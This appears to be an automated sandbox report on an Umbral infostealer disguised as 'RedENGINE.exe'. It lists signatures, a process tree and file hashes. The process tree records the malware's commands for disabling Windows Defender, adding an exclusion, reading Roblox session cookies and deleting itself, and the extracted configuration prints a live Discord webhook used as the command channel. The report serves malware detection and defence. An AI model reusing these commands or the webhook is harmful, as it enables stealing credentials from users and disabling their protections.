Analysis

  • max time kernel
    50s
  • max time network
    53s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-12-2024 08:56

General

  • Target

    https://gofile.io/d/Eiekwc

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1316012120852271164/V1HOi6SdpHwBCrwfMTkQ7iyqzGrHg9hHjVbkVFPf0WqESb3AK1q2xVAPNSMIOW0bH_ER

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/Eiekwc
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3464
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8b7e846f8,0x7ff8b7e84708,0x7ff8b7e84718
      2⤵
        PID:3200
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
        2⤵
          PID:1088
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4624
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
          2⤵
            PID:1424
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
            2⤵
              PID:4788
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
              2⤵
                PID:3684
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:1
                2⤵
                  PID:4140
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4164 /prefetch:1
                  2⤵
                    PID:2328
                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
                    2⤵
                      PID:1020
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2536
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
                      2⤵
                        PID:4796
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4168 /prefetch:8
                        2⤵
                          PID:4044
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
                          2⤵
                            PID:2432
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3620 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3612
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
                            2⤵
                              PID:5140
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
                              2⤵
                                PID:5148
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:1
                                2⤵
                                  PID:5996
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,17701582437451906673,4101505964451685972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
                                  2⤵
                                    PID:6008
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:4100
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:3536
                                    • C:\Windows\System32\rundll32.exe
                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                      1⤵
                                        PID:1480
                                      • C:\Program Files\7-Zip\7zG.exe
                                        "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\RedENGINE\" -ad -an -ai#7zMap8949:80:7zEvent11287
                                        1⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of FindShellTrayWindow
                                        PID:2488
                                      • C:\Users\Admin\Downloads\RedENGINE\RedENGINE.exe
                                        "C:\Users\Admin\Downloads\RedENGINE\RedENGINE.exe"
                                        1⤵
                                        • Drops file in Drivers directory
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1508
                                        • C:\Windows\System32\Wbem\wmic.exe
                                          "wmic.exe" csproduct get uuid
                                          2⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4488
                                        • C:\Windows\SYSTEM32\attrib.exe
                                          "attrib.exe" +h +s "C:\Users\Admin\Downloads\RedENGINE\RedENGINE.exe"
                                          2⤵
                                          • Views/modifies file attributes
                                          PID:5284
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\RedENGINE\RedENGINE.exe'
                                          2⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5340
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                          2⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5508
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          2⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5716
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5940
                                        • C:\Windows\System32\Wbem\wmic.exe
                                          "wmic.exe" os get Caption
                                          2⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5292
                                        • C:\Windows\System32\Wbem\wmic.exe
                                          "wmic.exe" computersystem get totalphysicalmemory
                                          2⤵
                                            PID:4892
                                          • C:\Windows\System32\Wbem\wmic.exe
                                            "wmic.exe" csproduct get uuid
                                            2⤵
                                              PID:5496
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                              2⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:5408
                                            • C:\Windows\System32\Wbem\wmic.exe
                                              "wmic" path win32_VideoController get name
                                              2⤵
                                              • Detects videocard installed
                                              PID:5660
                                            • C:\Windows\SYSTEM32\cmd.exe
                                              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\RedENGINE\RedENGINE.exe" && pause
                                              2⤵
                                              • System Network Configuration Discovery: Internet Connection Discovery
                                              PID:5188
                                              • C:\Windows\system32\PING.EXE
                                                ping localhost
                                                3⤵
                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                • Runs ping.exe
                                                PID:5248

                                          Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                            Filesize

                                            2KB

                                            MD5

                                            d85ba6ff808d9e5444a4b369f5bc2730

                                            SHA1

                                            31aa9d96590fff6981b315e0b391b575e4c0804a

                                            SHA256

                                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                            SHA512

                                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                            Filesize

                                            152B

                                            MD5

                                            bffcefacce25cd03f3d5c9446ddb903d

                                            SHA1

                                            8923f84aa86db316d2f5c122fe3874bbe26f3bab

                                            SHA256

                                            23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405

                                            SHA512

                                            761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                            Filesize

                                            152B

                                            MD5

                                            d22073dea53e79d9b824f27ac5e9813e

                                            SHA1

                                            6d8a7281241248431a1571e6ddc55798b01fa961

                                            SHA256

                                            86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6

                                            SHA512

                                            97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                            Filesize

                                            144B

                                            MD5

                                            e5d707e2df9fd98e80c4a14c3c3722d3

                                            SHA1

                                            c9d3eabd684c03cbb93708d72914eb578393dfcc

                                            SHA256

                                            ee27def5b69c04dbce98a5fffa675a10b954434da78e9f769372381be6f4767f

                                            SHA512

                                            8af964c34798f3d4aeb12851dd3e918f228d4638bbf23d1aa29f32fc02c867c9a5c69a712ee23a774509c4f612bca1c6de19650c6e2463e86db813c2a6d5e5e2

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                            Filesize

                                            1KB

                                            MD5

                                            7dfef61e22aa007b33460cae7a0901da

                                            SHA1

                                            5ae7fafd43e1c7a50f6e04db226affa8eddeffb8

                                            SHA256

                                            75c95590eb4d64999c02c9f35c320994e5d32564ec452cf2dde0988942c9c7c6

                                            SHA512

                                            1ad563a8f8423995c6624ea1be4b346d3c4288a6ee3bbabc8ec02a387cbd02a4605274a2a1c21f33818fdab89ba7f71fa188a1320c8b20a13f31ea2c5c2fe203

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                            Filesize

                                            6KB

                                            MD5

                                            afa9a02327241385b381b2bcfa80a8f4

                                            SHA1

                                            d0add1071b7f1707e073acb7e4cf7dc27a230523

                                            SHA256

                                            df0e1be4157499dd25deb0a1508da5bbe6ea0832cb930441d7f5127539f1b92b

                                            SHA512

                                            929485e48f1151bdbfda6def0261c4fa6074d4a81e097ee552a150fb44da034df79693df9bc9bc908a944507e12f572be7a32f573ef084e9cc083c870598cd4d

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                            Filesize

                                            5KB

                                            MD5

                                            d5f85b5af4bfd312e1f604999d2da21b

                                            SHA1

                                            809e9e3a0f246ceda20c71ddf115b87db0083c2e

                                            SHA256

                                            37e0c7d935c731d3bdf3e0a5a3b12823c04fa7402f3a7c5952003c99e99595c8

                                            SHA512

                                            fe28b5abed6742b01715b0cedec9bccfc1d4d77bc2704e66842618dbb8127307239a53bb465951371b3f2f4e551dccf9c404b6d1b80494353556c66e670809d0

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                            Filesize

                                            6KB

                                            MD5

                                            68d32488620440e72eef2a60e2dcbfe0

                                            SHA1

                                            1b6a80c3febc7938e6b9246b299568d8931c0a44

                                            SHA256

                                            44c906308abacfddd4575b4f3122f3214239a278e4de6c3c6eea21f8cb3cd423

                                            SHA512

                                            a2a3e6e736b7cfb202473adfdfb880c60cff3d195cead3ca36ba3886fe6a05b7d5d26f027f875c4845bbed7db25e3f9183037110c6ec18b5caedda616c1e738d

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                            Filesize

                                            16B

                                            MD5

                                            6752a1d65b201c13b62ea44016eb221f

                                            SHA1

                                            58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                            SHA256

                                            0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                            SHA512

                                            9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                            Filesize

                                            10KB

                                            MD5

                                            b00ea6ac896f59438f0b16836639d40a

                                            SHA1

                                            833f4a2bb1466a8f7a38d029f610018f764a7deb

                                            SHA256

                                            46101ab7af35d12490af93aa63a09800313cbc4cd7ad47683c311733f2237a26

                                            SHA512

                                            5e0eca74a697147db87351d6409c77d0504a8deadfddb48e32623a0a6a167537a2ac052d0143d9468eb3c76ebdf3d593e1fc7232397ad8ba9682e6db77ee3f8e

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                            Filesize

                                            10KB

                                            MD5

                                            5bfec910e53eef5799ef658bd529bd04

                                            SHA1

                                            25eea091db6ced382099bc425956b5c6257fc1a1

                                            SHA256

                                            9a6924881ba623ba9e2367a279c739c1649ed5e6f3ed105bc745a5bbb8fc0734

                                            SHA512

                                            2bf0efa853cb1738c1c1153f5d71f9bbc72ede238e1a33c14b6d8f46c2cbc26aa1c7e5e6a8f196f37c045e52eff1cd7d516474ae678fc5ed2460cab0b4e0903a

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                            Filesize

                                            10KB

                                            MD5

                                            10c3f6f7bed169949f9841c9668e1404

                                            SHA1

                                            346fca79566ae69329c714cf5d267f21c3943b61

                                            SHA256

                                            5b0736d38fdd00545010e3e6be3a1edbae32c090a3dc0c2cddf93c9326958ee9

                                            SHA512

                                            b446cb9a58ace8cb191ab8152a1fde81a380a51c30e6256a8894d637fe80bf71e3e49badda5045a81b6275340692d057d0bfd319dfdff806e20f366b6a15ad07

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            944B

                                            MD5

                                            cadef9abd087803c630df65264a6c81c

                                            SHA1

                                            babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                                            SHA256

                                            cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                                            SHA512

                                            7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            948B

                                            MD5

                                            74a6b79d36b4aae8b027a218bc6e1af7

                                            SHA1

                                            0350e46c1df6934903c4820a00b0bc4721779e5f

                                            SHA256

                                            60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04

                                            SHA512

                                            60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            1KB

                                            MD5

                                            276798eeb29a49dc6e199768bc9c2e71

                                            SHA1

                                            5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                                            SHA256

                                            cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

                                            SHA512

                                            0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            1KB

                                            MD5

                                            6317adf4fbc43ea2fd68861fafd57155

                                            SHA1

                                            6b87c718893c83c6eed2767e8d9cbc6443e31913

                                            SHA256

                                            c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af

                                            SHA512

                                            17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0

                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xnhnh3dg.ovw.ps1

                                            Filesize

                                            60B

                                            MD5

                                            d17fe0a3f47be24a6453e9ef58c94641

                                            SHA1

                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                            SHA256

                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                            SHA512

                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                          • C:\Users\Admin\Downloads\RedENGINE.rar

                                            Filesize

                                            79KB

                                            MD5

                                            1a72672376819243d978e8e0f17d73bf

                                            SHA1

                                            88c9e540076061d96ed87d7da51ef838ccf13a1a

                                            SHA256

                                            d263d7683b3d11b6afbb35c4d5be76f3f991042947fce348d13623b04044c421

                                            SHA512

                                            da660c98e79b2470fb51952242c41f003b39b3f6a5bda0fa3e2a8cf0a6cbaf22d7abe5ef53b8950ea122269265787a802fdc107c2a8b804b9e6f821a53792bba

                                          • C:\Users\Admin\Downloads\RedENGINE\RedENGINE.exe

                                            Filesize

                                            229KB

                                            MD5

                                            1871e43b687bcb017541fffe37ec8ff5

                                            SHA1

                                            6d87b2755fdd1e184c15df2bf371ca1eb7c9b93b

                                            SHA256

                                            a1a7e9f70c42e5688e9dc9c9a9ffb01dfca8f42defda647ff29263a9a5fbf28e

                                            SHA512

                                            d905e7344f7525701755681db8663e0b03e21bc65638f82121d9f317b93224017821ed105f058c45ef397ae22a3525775137b0aa4060ec4e5f112410723bb01e

                                          • C:\Windows\system32\drivers\etc\hosts

                                            Filesize

                                            2KB

                                            MD5

                                            4028457913f9d08b06137643fe3e01bc

                                            SHA1

                                            a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

                                            SHA256

                                            289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

                                            SHA512

                                            c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

                                          • memory/1508-148-0x0000019AFFF80000-0x0000019AFFFD0000-memory.dmp

                                            Filesize

                                            320KB

                                          • memory/1508-151-0x0000019AFFCD0000-0x0000019AFFCEE000-memory.dmp

                                            Filesize

                                            120KB

                                          • memory/1508-115-0x0000019AFE0D0000-0x0000019AFE110000-memory.dmp

                                            Filesize

                                            256KB

                                          • memory/1508-147-0x0000019B00000000-0x0000019B00076000-memory.dmp

                                            Filesize

                                            472KB

                                          • memory/1508-195-0x0000019AFFCB0000-0x0000019AFFCBA000-memory.dmp

                                            Filesize

                                            40KB

                                          • memory/1508-196-0x0000019AFFF50000-0x0000019AFFF62000-memory.dmp

                                            Filesize

                                            72KB

                                          • memory/5340-118-0x0000025BEDFE0000-0x0000025BEE002000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/5340-130-0x0000025BEE270000-0x0000025BEE3BE000-memory.dmp

                                            Filesize

                                            1.3MB

                                          • memory/5408-211-0x0000016F5A7A0000-0x0000016F5A8EE000-memory.dmp

                                            Filesize

                                            1.3MB

                                          • memory/5508-143-0x000001FAF7F50000-0x000001FAF809E000-memory.dmp

                                            Filesize

                                            1.3MB

                                          • memory/5716-175-0x00000179F7BE0000-0x00000179F7D2E000-memory.dmp

                                            Filesize

                                            1.3MB

                                          • memory/5940-192-0x0000019D446C0000-0x0000019D4480E000-memory.dmp

                                            Filesize

                                            1.3MB